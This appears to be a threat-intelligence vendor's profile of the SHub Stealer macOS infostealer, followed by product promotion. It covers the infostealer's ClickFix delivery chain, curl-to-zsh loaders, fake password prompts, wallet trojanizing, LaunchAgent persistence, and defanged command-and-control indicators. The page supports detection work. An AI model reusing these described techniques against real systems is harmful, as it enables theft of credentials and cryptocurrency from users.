SHub Stealer
SHub Stealer is a macOS infostealer actively deployed in multiple campaigns in 2025–2026, including ClickFix-style social-engineering operations and later installer-based delivery. It is commonly referred to as “SHub Stealer” and has also been observed as “SHub Stealer v2.0,” with one variant tracked under the build tag “Reaper.” Earlier campaigns tricked users into pasting malicious commands into Terminal from fake troubleshooting pages, fake GitHub installers, fake Apple security update prompts, IPL streaming lures, and a fake CleanMyMac site at cleanmymacos[.]org; additional reporting describes fake WeChat and Miro installers used by the Reaper variant. The malware is delivered through shell loaders that decode and decompress payloads, then execute an AppleScript second stage via osascript, often filelessly. Reported infrastructure and delivery paths include res2erch-sl0ut[.]com, coco2-hram[.]com, terafolt[.]com, and typo-squatted Microsoft-themed hosting, with some campaigns using applescript:// to invoke Script Editor and bypass newer Terminal paste protections in macOS 26.4.
Its core capability set is broad credential and data theft from macOS hosts. Reported targets include saved passwords and browser data from Chromium-based browsers, Firefox, and Safari; cookies and autofill data; macOS Keychain contents; iCloud-related data; Apple Notes; Telegram Desktop sessions; shell history; documents and media files; and cryptocurrency wallet data. Multiple sources state it targets over 100 browser wallet extensions and more than 20 desktop wallet applications, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Trezor Suite, Electrum, Coinomi, Guarda, Sparrow, Wasabi, Bitcoin Core, Monero, Litecoin Core, Dash Core, Dogecoin Core, and others. Some reporting notes theft of AWS credentials, SSH keys, Kubernetes configuration files, corporate SSO sessions, and crypto seed phrases in broader ClickFix campaigns where SHub Stealer was one of the payloads.
SHub Stealer uses a fake macOS password prompt, often styled as System Preferences, to harvest the user’s login password and validates it locally with dscl . -authonly, with some reports noting up to 10 retries. It stages collected data in temporary directories such as /tmp/shub_<random>/, compresses it, and exfiltrates it over HTTPS, including to /gate endpoints and heartbeat APIs such as /api/bot/heartbeat. Reported exfiltration and C2-related infrastructure includes terafolt[.]com/gate, terafolt[.]com/api/bot/heartbeat, res2erch-sl0ut[.]com/gate, coco2-hram[.]com/api/debug/event, hebsbsbzjsjshduxbs.xyz, and wallets-gate[.]io/api/injection. Observed telemetry includes events such as cis_blocked and loader_requested.
A notable feature is wallet backdooring for persistence and follow-on theft. SHub Stealer has been reported replacing app.asar files or entire wallet applications with trojanized versions of Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite, then re-signing or otherwise modifying them so they continue to run. These trojanized wallets steal passwords, mnemonics, seed phrases, or seed files when the user next opens the wallet. Persistence on macOS is also established through LaunchAgents and fake Google update components, including com.google.keystone.agent.plist and a GoogleUpdate binary under ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate; some reports also describe remote command execution via heartbeat responses. Additional capabilities reported for newer variants include remote access functionality, silent screenshot capture, audio muting during exfiltration, virtualization/sandbox checks, and a self-destruct routine.
Several sources describe geofencing behavior consistent with CIS avoidance: the loader checks for Russian or CIS-region keyboard layouts, sends a cis_blocked event, and exits if detected. Reporting also notes overlap in tradecraft and functionality with Macsync, AMOS, and Odyssey, and some analyses assess SHub Stealer as part of an AppleScript-based macOS stealer family. High-confidence indicators mentioned in the content include cleanmymacos[.]org, res2erch-sl0ut[.]com, coco2-hram[.]com, terafolt[.]com, wallets-gate[.]io, hebsbsbzjsjshduxbs.xyz, com.google.keystone.agent.plist, /tmp/shub_<random>/, and the GoogleUpdate persistence path under the user Library Application Support directory.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesHosting Layer: The secondary payload packages are hosted on typo-squatted web domains mimicking legitimate Microsoft infrastructure.
the infection vector wraps its payload inside a seemingly normal, signed application installer disguised as standard collaboration tools like Miro or WeChat.
Initial Access
2 techniquesVictims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.
Reaper uses fake WeChat and Miro installers as lures... Instead of forcing text interaction, the infection vector wraps its payload inside a seemingly normal, signed application installer disguised as standard collaboration tools like Miro or WeChat.
Execution
6 techniquesThe malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.
ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.
Since February 2026, one observed campaign variant uses curl to pull a loader shell from attacker infrastructure the moment the ClickFix command runs. That loader is a zsh script, a macOS default shell that decodes and decompresses an embedded payload using Base64 and Gzip before executing it in memory using eval.
The page provides detailed instructions to the victim to open the Terminal and paste the command to complete the installation.
Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.
Persistence
3 techniquesThe malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist). This service runs every 60 seconds.
Privilege Escalation
3 techniquesThe malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist).
The malware establishes persistence by creating a fake Google Update application and installing a LaunchAgent (com.google.keystone.agent.plist). This service runs every 60 seconds.
Stealth
4 techniquesline 13 displays an obfuscated curl command that uses the native tr utility to dynamically decode a hidden URL
Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.
It then checks whether the infected system uses a Russian keyboard layout (a common CIS geofencing technique). If a Russian keyboard is detected, the script sends a "cis_blocked" telemetry event to the command-and-control server and terminates immediately.
piping the payload directly into zsh for memory-resident execution to avoid disk detection.
Credential Access
7 techniquesThe malware attempts to steal the macOS login password. It displays a fake “System Preferences” dialog (with the official LockedIcon) up to 10 times, asking the user to enter their password.
Exfiltration efforts focus on high-value data, including ... messaging session tokens (Telegram/Discord)
Once active on the host machine, Reaper runs a local configuration sweep that targets typical info-stealer objectives—vacuuming system profiles, local browser credential vaults, session cookies, and cryptocurrency wallet keys.
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains
Exfiltration efforts focus on high-value data, including ... macOS Keychains
Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox)
Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.
Discovery
3 techniquesThe first thing the loader does is system fingerprinting by collecting the hostname, macOS version, external IP address, and keyboard layout information.
Sensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Collection
4 techniquesOnce active on the host machine, Reaper runs a local configuration sweep that targets typical info-stealer objectives—vacuuming system profiles, local browser credential vaults, session cookies, and cryptocurrency wallet keys. The module is engineered to search local user paths for high-value text documents, PDFs, spreadsheet configurations, and database assets.
The malware attempts to steal the macOS login password. It displays a fake “System Preferences” dialog (with the official LockedIcon) up to 10 times, asking the user to enter their password.
Clicking on fake streaming links can result in full device compromise, including silent theft of passwords, banking credentials, browser sessions, and crypto wallets with a persistent backdoor left running in the background.
Sensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Command and Control
2 techniquesThe native LaunchAgent configuration is designed to trigger this GoogleUpdate beacon script automatically every 60 seconds, logging system details and checking in with the C2 server’s /api/bot/heartbeat endpoint.
Initial commands leverage curl to fetch obfuscated payloads
Exfiltration
1 techniqueSensitive assets are staged in temporary directories (e.g., /tmp/shub_), compressed, and exfiltrated via encrypted HTTPS channels.
Other
1 techniqueIOCs tracked for this family
132 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
17 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A macOS infostealer used in ClickFix campaigns. The content describes staging stolen data in temporary directories such as /tmp/shub_, compressing it, and exfiltrating it over HTTPS. It also includes credential harvesting, persistence, anti-analysis, screenshot capture, and self-destruct capabilities.
A macOS information stealer framework whose Reaper variant uses fake WeChat and Miro installers, a multi-stage delivery chain, persistence via a User LaunchAgent masquerading as GoogleUpdate, and steals system profiles, browser credentials, session cookies, cryptocurrency wallet keys, and documents.
A macOS infostealer delivered via ClickFix-style lures on fake IPL streaming sites. It fingerprints the host, steals credentials, browser data, crypto wallets, Telegram sessions, Keychain and iCloud data, grabs files, injects code into wallet applications to steal seed phrases, exfiltrates collected data, and establishes persistence via a fake Google Update LaunchAgent that can execute commands from C2.
A stealer malware observed in the campaign targeting macOS users via deceptive troubleshooting pages, aimed at collecting private files, credentials, and cryptocurrency-related data.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.